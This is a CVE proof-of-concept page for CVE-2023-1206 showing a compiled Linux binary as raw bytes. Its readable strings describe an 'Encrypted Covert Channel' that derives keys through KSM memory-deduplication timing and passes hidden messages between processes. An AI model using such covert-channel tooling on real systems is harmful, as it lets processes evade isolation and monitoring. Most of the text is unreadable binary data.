4837 Total CVEs
26 Years
GitHub
Home / 2023 / CVE-2023-1206
README.md
Rendering markdown...
POC / covert_encrypted
⬇ Raw GitHub ✕ Close 
ELF>�@�@8
@'&@@@��ii   00-==P-==��88800hhhDDS�td88800P�td�%�%�%llQ�tdR�td-==/lib64/ld-linux-x86-64.so.2 GNU���GNUԷY��NG<��h���w+GNU��e�m9����+0s ��E
���L�X0 �l8�@?��? Q�"�@@e @putsperror__stack_chk_fail__printf_chkfreeputcharmunmapfopenstrlenreadusleep__memcpy_chkoptargmalloc__libc_start_mainstderrgetopt__cxa_finalizefclosememsetsignalmemcpyfwritemadvisemmaplibc.so.6GLIBC_2.14GLIBC_2.3.4GLIBC_2.4GLIBC_2.34GLIBC_2.2.5_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTable�����ti	�ii
�����ui	=�=@@@�?�?�?�?�? @@@? ?(?0?8?@?H?	P?
X?`?h?
p?x?�?�?�?�?�?�?�?�?�?�?�?��H��H��/H��t��H����5�.�%�.@��h���f���h����f���h����f���h���f���h���f���h���f���h���f���h�r���f���h�b���f���h	�R���f���h
�B���f���h�2���f���h�"���f���h
����f���h����f���h��f���h���f���h����f���h����f���h���f���h���f���h���f���h���f���h�r���f����%>.fD���%N-fD���%F-fD���%>-fD���%6-fD���%.-fD���%&-fD���%-fD���%-fD���%-fD���%-fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fD���%�,fDH�=�������f.�f���AVE1�AUE1�ATL�%�U��SH��H��0dH�%(H��$(1�L��H�މ��k������tn��rta��stL��kt7H�;��1�H��$(dH+%(��H��0[]A\A]A^�fDA���L�5,A�뉐A��H�=�
H�����H�=b���H�=����H�=����H�5>������ H���g����A��tiA����A���.���L��H�5��1������ H��L���������H�
�+��H�={�J�������H�=r�dL�d$ ����,� H��L���3��ta����������������*��u����H�=����H�=�����q���H�
�*��H�=�����d���H�=��b���L���Z���H�=�N����*������@��1�I��^H��H���PTE1�1�H�=�����*�f.�H�=A*H�:*H9�tH��)H��t	�����H�=*H�5
*H)�H��H��?H��H�H�tH��)H��t��fD�����=�)u+UH�=�)H��tH�=�)�I����d�����)]������w�������r)��I��H��tE1��L��1�H��A�B0I��L9�u��D��AWH��1�AVAUL�-L
ATI��H�5	USH���H�����L��H�=%
����H��t$H��H����H�=
���H������L��H�=����H��H��t!H�=�H�������H�����L��E1�A�����1�H���"�H��H�$���H�D$H��������L�|$H�4$�L��L������1�L��H���n���H����I�E1��DI��I9����
(����D��I�L����H���H)�����I���I�I����H��P����1H��A���A���1��H)�H=�vL��D��H������L��I����?H��?�Y���H��L��H�5�1��I���	���I9��@���H�4$H�|$N�,#H�-�����H�=w���H�5��1�����M��t�H��1�H�����I9�u�
���1�H��[]A\A]A^A_�f.���AWAVI��AUATA�UH��SH��H�|$���L9�I��LF�M�l$L���!���H����D� H�t$H�xL��L��H������M��t#1��H��1�H��A�0DH��L9�r溶�AH�=�
1�����Ņ�xCL��H�މ�������T���H�����L��1�H�5S���1�H��[]A\A]A^A_�H������������fD��AWAVAUATI��UH��SH��1�H��(H�|$H�=9
dH�%(H�D$1��b������H�t$���A������H����D�l$H�C�M��L9���L������H��H����L��H��D�����I9���D���d���1�M��tDH��1�H��A�0H��I9�u�L�|$L��H��L���l���C�/H�����D��1�H�5F�y���1�H�T$dH+%(uDH��([]A\A]A^A_��D�k�M���=���H���<���D������������D��������~���ff.���SH��H�5�H��1����H�=�����H�=����H�=����H�=���H�=3����H�=W����H�=����H�=����H�ڿ1�H�5��|���H��H�5J[�1��e�����H��H���[KSM] Deriving %zu-byte key via KSM timing...
/sys/kernel/mm/ksm/sleep_millisecs[TX] Sent %zu encrypted bytes
[RX] Received %u decrypted bytes

Encrypted Covert Channel DemoUses KSM timing for key agreement + encrypted data transfer  -s MESSAGE  Send encrypted message  -r          Receive and decrypt message  -k          Just derive and display key  Terminal 2: sudo %s -s 'SECRET MESSAGE'
╔════════════════════════════════════════════════════════════════╗║  Encrypted Covert Channel                                      ║║  CVE-2023-1206 + CVE-2024-49882 + CVE-2025-40040               ║╚════════════════════════════════════════════════════════════════╝

[Key] Key derivation complete.[Key] Use this key for manual encryption.w/sys/kernel/mm/ksm/run1
20
mmap[KSM] Key derivation complete[KSM] Key: [KSM] Derived %zu/%zu bits
%02x/dev/shm/.covert_channelUsage: %s [options]

Options:  -h          Show this help
Example:  Terminal 1: sudo %s -r
s:rkhFailed to derive key

[TX] Sending: "%s"
Send failed

[RX] Waiting for message...
=== Decrypted Message ============================;ht��������h��<��������$��������� zRx�h�&D$4���FJw�?9*3$"\8�t0��������+H��fF�G�B �I(�K0�A8�LP+8A0A(B BBB$�P������H �F�B�E �B(�G0�D8�DP�
8A0A(B BBBAHl��bF�B�B �B(�D0�D8�I`
8A0A(B BBBI���E��@�p�<F�E�E �H(�C0�J�\
0A(A BBBG�@�
\==���o���
Y?@�	��	���o���o����o�o:���o=0@P`p�������� 0@P`p���@GCC: (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0L��@`<g!.j\
�6��/Dr�t
:&K�0int1s
O*=�
N-6
��
���
:�=
����{�27�1N
3s6	��7	�8	��9	� �:	�(�;	�0P<	�8�=	�@@	�HtA	�P B	�X_Dg`Flh�Hsp;IstCJ�xMR��NY�0Oq�*Q��GY
��-[���\���]l�e^	D�3_
*��`s�Gb��
;	�3�+Zb���6Z*�����6��

N�N�#P
���}��4
<`�
Q
P��#c$�
]
H385Cs$�&z	@
�
X'ss'
[s�s���
0��sD**� 0��sD**#��
sD*�Zs*�s
HsE�s%�%%�#�fshs�z��s�*&���D�D�*��*��
64s�s�
�1s�s�
�Ls!D*�s8�
�^sXD*s&�
nj�
�9D�D*sss�
�
�s��Y
������s`<�W��sW�RD��	s��(����opt�	s��6key�
W��w''�7�g��w('8i
s��Hrr�W��~U	v%H~~
!W�U|H�<cW�U	�%
�U|T
QvR !U��H��W+)'U	�!H''�5W?=3U	�"H33��WSQ?U	�"H??��WgeKU	 #H���	'	W{y��U2T	7%Q~e��
�	���)t�hU	L%T1Q<H�	�	W���U	Y%H33	
W��?U	�#H?L	V
W��KU	$ePP�	�
���)tmhU	!%T1QE�s�
UvTsQ| �x\XU2T	�i�%UvT ��IU~TvQ  ���g6�x96�*�ư������H����W42��U2T	�$QsH���@WLJ�U	� H����W`^�U	� H����Wtr�U	�$H���'
W���U	!H���t
W��
U	8!H

��
W��U	h!H�W��"U	�$H""�[W��.U	�$H..��W��D�U2T	%Qs+HD��W
�!�:[�U2T	�!Q�UQ�s@b��(����-*'!key�D�_W0�P*��fd�	s��$��
���len�������!�y���?=�OM~
U	�$T0����	f�ge�yu�����UT��Q4����	������������UTsQ}��%�N?��5��+,K�%"L.*��;EC/\Z#ki$!U��TsQ}H11�W|zG�U2T	� Q~��,U}�QDU1�\Us��tUs�Q�U�Q�U �����6�r�s@���(� ���!key�8���0�D*��len�*
���_Yfd�	s�{����;��/��#���&!UsT��Q|R|��(�A?��5��+,K�("L&"������=;�OM�
U	�$T
AQ
�H�Wge�U2T	h Q|h�U���3U}�hWUvTsQ}�QoUv��Us3�Us;e8s�!key8��}08)*��f=��hD*F:lED��'K/bitQ*��(\�RD		@V�G	E	t1]Y	W	t2]h	f	<�e�rW	�w	u	��	�	��	�	H��m
W�	�	��U2T	�$Q~RvK!U
P�=�#�iu*�	�	+H�u)W�	�	�U2TvH�2:�W


�U2T	 Q|e>G�"
 
t<
8
5hU	K$T1Q2RveTTA��R
P
tl
h
mhU	N$T1Q3Rv���
N�
�
��
�
��
�
�/!UsT0Q|H��siW�
�
�U	W$H��t�W�
�
��U2T	u$H
vW�
�
%a!U:�%U	4$T}=�=UvL�bU	@ T}u�zUv�j�U0T��Q3R"X	�Y0�8�UT��Q<��U��T��LXU	R$>�-X	�-�-len&*-key:�	0-F*?@i/**�(���Asig(sUZ)s�	D)�	�)s���	Cs	HD	\%*v9D	
9D	K9s	�9*#DH	
F	��	�*�Tse	-T ��Ms�	�M�	-M<�B�+��U+T5�
�
?RCK"L
�
=== Decrypted Message ===
%�%s
�=========================
���╔════════════════════════════════════════════════════════════════╗
J�H║  Encrypted Covert Channel                                      ║
J�H║  CVE-2023-1206 + CVE-2024-49882 + CVE-2025-40040               ║
���╚════════════════════════════════════════════════════════════════╝

�� �
[RX] Waiting for message...
#�!
[Key] Key derivation complete.
-�+[Key] Use this key for manual encryption.
D��"� 
Encrypted Covert Channel Demo
?�=Uses KSM timing for key agreement + encrypted data transfer

�
Options:
(�&  -s MESSAGE  Send encrypted message
-�+  -r          Receive and decrypt message
-�+  -k          Just derive and display key
 �  -h          Show this help

�
Example:
#vl!�[KSM] Key derivation complete
�
��I~1�BIH}
:!;9I81R�BX!YWH}6	:;9I
:;9I!I$>
.?:;9'I<4:!;9I�B:!;9I�B4:!;9I�B1R�BUX!YW.?:;9'I<.?:;9!'I !4.?<n:!;!I7I!I/1R�BX!YW1&I<.?:;9n'I<.?:!;9!'I@z1R�BUX!YW H}!:!;9I�B"41�B#4:;9!I?<$4:!;9I%.?:!;9!'<&.?:;9!
'<'U(U)1*.?:!;9!'@z+1R�BUX!YW,1-:!;!-9I.%U/0$>15I2:;93:;94&5'64:;9I74:;9I84:;9I�B9!I/:H}�;.?:;9'IU@z<4:;9I=>.?:;9' ?@4:;9IA:;9IB.1@zC1UD.?<n�
��
Or�����!*29@HWen|����	�' J+38�4K
=X	K�"�JXmKc
.cXNp
Xtc
XXc
JXg��
�!o�	!X
�"r�-�+�<
�k
�
+J
jf�:�+t�	�b
e<t
e<J
e.�	�Y#'J	g>/$.?
�(< <X(J <.	?
=I<
�g
+7
yX:
+� <Za
�`
.
)�_)
a<�
aJX%Y^
�"/�t	@	K�d��;=L��
�<�X
�J���
X��
X	��"�JX����O�u��
X�/�...	v �s��f.�J�Xt���X�
�~����~
X��YI=����~
�����~
.	��"�JX��~
X��Y��
X�/X.h�J<		X��l	x�.1K��
� ��
�<tX��
���
���
���
���
���
���
���
���
X��
��
� �		@��	`�h:	/;f/00�	Y��M7.	�-
�
u
h>��~
	�t
�~<X��~
���~
���~
��	��	��~
X	�
�
��~
�
�x	
��~
��
�~XX
�%/JP2y�%��	
�~
�	��~
�	�
�~	�X�~
�	�X�~
���~
���~
��
�~�X__off_t_IO_read_ptrmalloc_chain__read_alias_shortbuf__uint8_t__path__ch_IO_buf_base__sighandler_t__builtin_memsetlong long unsigned int__src__open_too_many_argsfreemadviselong long int__builtin_fwrite__oflag_fileno_IO_read_end_IO_lock_tusleep_flags__ssize_t__builtin_puts_IO_codecvt__printf_chk_old_offset__uint32_t_IO_marker_freeres_bufsend_encryptedfprintf__open_missing_modeprog__streamprint_usagepage_IO_write_ptrmunmap__builtin_putcharshort unsigned intmaxlenstrlen_IO_save_basegetopt__builtin_memcpy_lock__read_chk_flags2__fd__open_2receive_encryptedoptargGNU C17 13.3.0 -mtune=generic -march=x86-64 -g -O2 -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection_IO_write_end__dest__builtin___memcpy_chkmessagekeylen_IO_FILEpattern__buf__uint64_tfopen_markersnum_pagesunsigned char_IO_buf_endshort intxor_cryptcycles_vtable_offset__fprintf_chk__stack_chk_failsignalmmaprunningargcbufferfclose__off64_t_cur_column_IO_read_base_IO_save_end__fmt__pad5__useconds_t_unused2stderrargv__nbytesderive_key_ksm_IO_backup_base__open_aliassignal_handlerperrorread_freeres_list_IO_wide_data__len__read_chk_warnmain_IO_write_baseheadercovert_channel_encrypted.c/home/vlad/Desktop/convert_channel_bug_exploitation/usr/include/x86_64-linux-gnu/bits/usr/lib/gcc/x86_64-linux-gnu/13/include/usr/include/x86_64-linux-gnu/bits/types/usr/include/usr/include/x86_64-linux-gnu/sysstdio2.hstring_fortified.hfcntl2.hunistd.hstddef.htypes.hstruct_FILE.hstdio.hstdint-uintn.hgetopt_core.hsignal.hunistd-decl.hstdlib.hstring.hstdio2-decl.hmman.h<built-in>`8U8YVY��U���V���U�`8T8aSa��T���S���T���S���T��0�hw1��0�ow^�PE�P�0�r��~����3'�3�M?���
7%��
L%���q3��?��P
!%��UQ�S��Q���U��
�$������ ��U ��d ��� 
�� �� "�!.
%�@)U)���@T�S���T���S���T�@=Q=�\���Q���\@=R=�V���R���V~P�_��_��_�	]	�^��]��^��]��^�P�S��Sy0�y
�$��4��T����P_�	~������
P
S�_�%V�%\�%	~������%S�0�%R	~�����S��1
� �@'U'���@'T'�^���T���^@'Q'�V���Q�nP�\��}|���$
#������������������,(���\"P"�S��S�P8VGNPNOV�\�T���Us��(V�(^�(\�(s��0�(R�
A��
�$�
h ��,U,�S���U���S@S�"T"4Q4�\���T���\@\ P )V;XPX�V��V@Vua|3$�a�V��|3$����T3$���|3$�@|3$��"P"I_��P@P���0�~�.~�.�^��P��~���~��_�`�#�_���`�|~�PP_P3
�3~��3_� 
�$��0�s�U��U s"��
�$��1
 �
K$�PVT
N$�TPV�
\�
0��
S��8!�
u$�
�[!�Q+Y�0�&Xy�&��@�#(,1���
2����
225<?CEe� 
�	W"'��D

��
G���?��@`��	� �.@6@J�U�Wj@�H@�=���=J��,(��=��%?/C` = @|f�@��\���+����	@b�*;@H[ @n� �@�� ��P@A�&� @��`<.-?Rex@���� �@��"���f��@@Scrt1.o__abi_tagcovert_channel_encrypted.crunningderive_key_ksm.coldcrtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entry__FRAME_END___DYNAMIC__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE_free@GLIBC_2.2.5putchar@GLIBC_2.2.5__libc_start_main@GLIBC_2.34_ITM_deregisterTMCloneTableputs@GLIBC_2.2.5_edatafclose@GLIBC_2.2.5_finistrlen@GLIBC_2.2.5xor_crypt__stack_chk_fail@GLIBC_2.4mmap@GLIBC_2.2.5memset@GLIBC_2.2.5receive_encryptedsignal_handlerread@GLIBC_2.2.5__data_startsignal@GLIBC_2.2.5optarg@GLIBC_2.2.5__memcpy_chk@GLIBC_2.3.4__gmon_start____dso_handlememcpy@GLIBC_2.14_IO_stdin_usedmalloc@GLIBC_2.2.5_end__bss_startmunmap@GLIBC_2.2.5main__printf_chk@GLIBC_2.3.4madvise@GLIBC_2.2.5fopen@GLIBC_2.2.5perror@GLIBC_2.2.5getopt@GLIBC_2.2.5fwrite@GLIBC_2.2.5__TMC_END__print_usage_ITM_registerTMCloneTablesend_encrypted__cxa_finalize@GLIBC_2.2.5_initderive_key_ksmusleep@GLIBC_2.2.5stderr@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.property.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.plt.sec.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.data.bss.comment.debug_aranges.debug_info.debug_abbrev.debug_line.debug_str.debug_line_str.debug_loclists.debug_rnglists#8806hh$I�� W���o��0a��i��Yq���o::@~���o��`�����B�	�	@��  ���������@@	�\\
�  ���%�%l�&&�=-�=-�=-��?/@0 @00 00+?0P)�0k!5�QC�U�
O0�`�Z0�e�j2gzQr}�sx%	HzW~�